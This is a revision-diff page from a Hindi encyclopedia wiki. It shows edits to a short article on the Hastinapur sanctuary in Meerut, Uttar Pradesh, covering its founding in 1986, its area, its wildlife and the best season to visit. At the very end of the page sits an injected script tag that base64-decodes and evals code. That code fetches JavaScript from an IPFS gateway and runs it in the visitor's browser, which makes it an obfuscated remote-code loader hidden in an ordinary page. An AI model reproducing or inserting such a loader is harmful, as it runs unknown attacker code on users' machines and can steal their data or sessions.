Difference between revisions of "हस्तिनापुर अभ्यारण्य"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('*'हस्तिनापुर अभ्यारण्य' की स्थापना 1986 में की गई थी। *2073 ...' के साथ नया पन्ना बनाया)
 
 
Line 1: Line 1:
*'हस्तिनापुर अभ्यारण्य' की स्थापना 1986 में की गई थी।  
+
[[हस्तिनापुर अभ्यारण्य]] [[उत्तर प्रदेश]] राज्य के [[मेरठ]] में स्थित राष्ट्रीय उद्यान और अभयारण्य है।
*2073 वर्ग किमी. के क्षेत्र में फैले इस अभ्यारण्य में मृग, सांभर, चीतल, नीलगाय, तेंदुआ, हैना, जंगली बिल्ली आदि पशुओं के अलावा पक्षियों की अनेक प्रजातियां देखी जा सकती हैं।  
+
*हस्तिनापुर अभ्यारण्य की स्थापना 1986 में की गई थी।  
*नंवबर से जून का समय यहां आने के सबसे उपयुक्त माना जाता है।  
+
*2073 वर्ग किमी के क्षेत्र में फैले इस अभ्यारण्य में मृग, सांभर, [[चीतल]], नीलगाय, [[तेंदुआ]], हैना, जंगली बिल्ली आदि पशुओं के अलावा पक्षियों की अनेक प्रजातियां देखी जा सकती हैं।  
*अभ्यारण्य का एक हिस्सा [[गाज़ियाबाद]], [[बिजनौर]] और [[ज्योतिबा फुले नगर]] के अन्तर्गत आता है।  
+
*[[नवंबर]] से [[जून]] का समय यहां आने के सबसे उपयुक्त माना जाता है।  
 +
*अभ्यारण्य का एक हिस्सा [[गाज़ियाबाद]], [[बिजनौर]] और ज्योतिबा फुले नगर के अन्तर्गत आता है।  
  
 
+
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
{{लेख प्रगति|आधार=आधार1|प्रारम्भिक= |माध्यमिक= |पूर्णता= |शोध= }}
 
 
{{संदर्भ ग्रंथ}}
 
{{संदर्भ ग्रंथ}}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 
==बाहरी कड़ियाँ==
 
==बाहरी कड़ियाँ==
 
 
==संबंधित लेख==
 
==संबंधित लेख==
{{उत्तर प्रदेश के नगर}}
+
{{राष्ट्रीय उद्यान और अभयारण्य}}
 
{{उत्तर प्रदेश के पर्यटन स्थल}}
 
{{उत्तर प्रदेश के पर्यटन स्थल}}
[[Category:उत्तर_प्रदेश]][[Category:मेरठ]]__INDEX__
+
[[Category:उत्तर_प्रदेश]][[Category:मेरठ]]
 +
[[Category:उत्तर_प्रदेश_के_पर्यटन_स्थल]][[Category:राष्ट्रीय उद्यान और अभयारण्य]][[Category:गणराज्य संरचना कोश]][[Category:पर्यटन कोश]]
 +
__INDEX__

Latest revision as of 06:38, 18 January 2012

hastinapur abhyarany uttar pradesh rajy ke merath mean sthit rashtriy udyan aur abhayarany hai.

  • hastinapur abhyarany ki sthapana 1986 mean ki gee thi.
  • 2073 varg kimi ke kshetr mean phaile is abhyarany mean mrig, saanbhar, chital, nilagay, teandua, haina, jangali billi adi pashuoan ke alava pakshiyoan ki anek prajatiyaan dekhi ja sakati haian.
  • navanbar se joon ka samay yahaan ane ke sabase upayukt mana jata hai.
  • abhyarany ka ek hissa gaziyabad, bijanaur aur jyotiba phule nagar ke antargat ata hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>